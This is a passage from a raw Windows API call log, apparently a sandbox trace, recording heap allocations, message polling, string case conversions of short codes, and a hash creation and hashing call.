(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.445] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0196.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.446] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.446] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.446] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.447] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0196.447] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.447] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0196.448] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.448] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.448] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.449] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.449] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.450] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.450] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.450] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.450] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.450] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.451] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.454] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0196.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.455] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.455] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.455] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.455] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.455] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.456] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.456] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.456] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.456] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.456] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.456] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.456] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0196.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.494] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.494] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0196.495] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.495] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.496] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.496] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.496] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0196.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.496] CryptHashData (hHash=0xaa58e0, pbData=0x24b1758, dwDataLen=0x3, dwFlags=0x1) returned 1 [0196.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 